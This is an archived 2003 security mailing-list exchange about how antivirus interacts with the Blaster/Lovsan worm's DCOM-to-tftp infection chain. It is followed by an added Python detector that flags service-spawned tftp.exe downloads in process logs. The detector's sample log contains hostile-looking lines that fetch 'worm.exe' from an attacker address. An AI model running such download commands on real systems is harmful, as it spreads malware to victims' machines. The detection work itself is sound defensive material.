Educause Security Discussion mailing list archives

Re: Interactions of AntiVirus and MBlaster/Lovsan-A & Stealther


From: Gary Dobbins <dobbins () ND EDU>
Date: Tue, 12 Aug 2003 13:15:07 -0500

What we know so far here suggests that the A/V would detect the worm's
file(s) as they're being written to disk, *if* scan on write is
enabled.  But, A/V will probably miss the initial incursion, where the
attacker initially causes the unwanted behaviour of the victim's DCOM
service process.

The attacker tells victim's DCOM to activate tftp.exe, instructing it
to fetch its own copy of the actual worm from the attacking machine.
At the point tftp writes the received file to disk A/V software may be
able to catch it, but the victim is already under the worm's control
at this point.  Assuming a variant strain of the worm doesn't appear,
a positive A/V alert indicates both presence of the vulnerability and
success of attack against the recipient.

Am surprised, actually, that the author wrote this worm to rely on
presence of tftp.exe.  Local tftp was used by 'ancient' worms such as
nimda, and some nimda remediation recommendations included removing
tftp.exe from machines where it wasn't needed.


Jim Moore wrote:

I am trying to understand how far Stealther and MBlaster/Lovsan-A get
before the latest antivirus intercepts them.  What has alarmed me is that
I have some reports of a reboot preceding the A/V warning.

Also, I am assuming that the most effective is when A/V is set to scan
on every write.  However, you know that impacts performance and a lot of
people slide back to scanning at lunch time, or in the evening.  I
assume that means that is then the window of opportunity for MBlaster.

I am not an A/V expert, can someone validate assumptions, and describe
how you handle it in communication to your end user community?

Jim
--
Jim Moore, CISSP, IAM
Information Security Officer
Rochester Institute of Technology
13 Lomb Memorial Drive
Rochester, NY 14623-5603
Telephone: (585)475-5406
Fax:       (585)475-7950

PGP (jimmoore () mail rit edu): 9C33 0328 CD59 B602 82B8 8521 0DC9 963C D0C0

**********
Participation and subscription information for this EDUCAUSE Discussion
Group discussion list can be found at http://www.educause.edu/cg/.
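The chain described above (remote host abuses the victim's DCOM service, DCOM launches tftp.exe, tftp.exe fetches the worm from the attacking machine, scan-on-write A/V fires only when the file lands on disk) gives a host-side indicator that is earlier than the A/V alert: a process-creation record showing tftp.exe doing a GET from a remote address, spawned by a service process rather than by someone's shell. The following is an added example, not code from either post or from any A/V product. The pipe-delimited log format, the sample lines, and the choice of svchost.exe as the image hosting the DCOM service are all assumptions made for the example.

```python
"""
Flag the tftp.exe download stage of the worm chain in process-creation logs.

Log format is an assumption for this example:
    timestamp|host|parent_image|image|command_line
The sample lines below are constructed, not captured from a real incident.
"""
import re
from dataclasses import dataclass
from typing import List, Set

# Constructed sample data: two infections via the DCOM service host, one
# legitimate admin upload from a shell, and one unrelated process.
SAMPLE_LOG = """\
2003-08-12T13:01:02|lab-pc-01|C:\\WINNT\\system32\\svchost.exe|C:\\WINNT\\system32\\tftp.exe|tftp -i 10.9.8.7 GET worm.exe
2003-08-12T13:01:05|lab-pc-02|C:\\WINNT\\system32\\cmd.exe|C:\\WINNT\\system32\\tftp.exe|tftp 10.0.0.5 put config.bin
2003-08-12T13:02:11|lab-pc-03|C:\\WINNT\\system32\\svchost.exe|C:\\WINNT\\system32\\tftp.exe|tftp -i 10.9.8.7 GET worm.exe
2003-08-12T13:02:30|lab-pc-04|C:\\WINNT\\explorer.exe|C:\\WINNT\\system32\\notepad.exe|notepad readme.txt
"""

# Windows tftp.exe syntax: tftp [-i] host [GET | PUT] source [destination]
# We only care about GET (the worm pulling itself down); PUT is not the pattern.
TFTP_GET = re.compile(
    r"^tftp(?:\.exe)?\s+(?:-i\s+)?(?P<remote>\S+)\s+get\s+(?P<file>\S+)",
    re.IGNORECASE,
)

# Assumption: the DCOM service runs inside svchost.exe.  A tftp GET whose
# parent is a service host, not an interactive shell, matches the chain
# described in the thread.  Adjust for your environment.
SERVICE_PARENTS = {"svchost.exe"}


@dataclass(frozen=True)
class Finding:
    timestamp: str
    host: str          # victim machine
    remote: str        # machine the file was fetched from (the attacker)
    filename: str      # file requested over tftp
    parent: str        # basename of the parent image
    service_spawned: bool


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_tftp_downloads(log_text: str) -> List[Finding]:
    """Return every tftp.exe GET seen in the log, oldest first."""
    findings: List[Finding] = []
    for line in log_text.splitlines():
        fields = line.strip().split("|", 4)
        if len(fields) != 5:
            continue  # malformed or blank line: skip rather than crash
        ts, host, parent, image, cmdline = fields
        if _basename(image) != "tftp.exe":
            continue
        m = TFTP_GET.match(cmdline.strip())
        if not m:
            continue  # uploads and other tftp usage are not the worm pattern
        parent_name = _basename(parent)
        findings.append(Finding(
            timestamp=ts,
            host=host,
            remote=m["remote"],
            filename=m["file"],
            parent=parent_name,
            service_spawned=parent_name in SERVICE_PARENTS,
        ))
    return findings


def likely_worm_fetches(findings: List[Finding]) -> List[Finding]:
    """Keep only GETs launched by a service host; a shell-launched GET is
    more likely an administrator and deserves a look, not an automatic alert."""
    return [f for f in findings if f.service_spawned]


def attacker_sources(findings: List[Finding]) -> Set[str]:
    """Distinct remote addresses the victims fetched from; candidates for a
    border block while the patch is rolled out."""
    return {f.remote for f in likely_worm_fetches(findings)}


if __name__ == "__main__":
    for f in likely_worm_fetches(find_tftp_downloads(SAMPLE_LOG)):
        print(f"{f.timestamp} {f.host}: {f.parent} launched tftp GET "
              f"{f.filename} from {f.remote} (A/V would fire only on write)")
    print("block candidates:", sorted(attacker_sources(find_tftp_downloads(SAMPLE_LOG))))
```

The point of splitting `find_tftp_downloads` from `likely_worm_fetches` is the caveat in the thread: a positive A/V alert means both the hole and a successful attack, and the tftp GET precedes that alert, so an alert on the GET catches hosts whose A/V only scans at lunch time. A GET from a shell still shows up in the first list for review, but only the service-spawned ones are treated as compromise.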
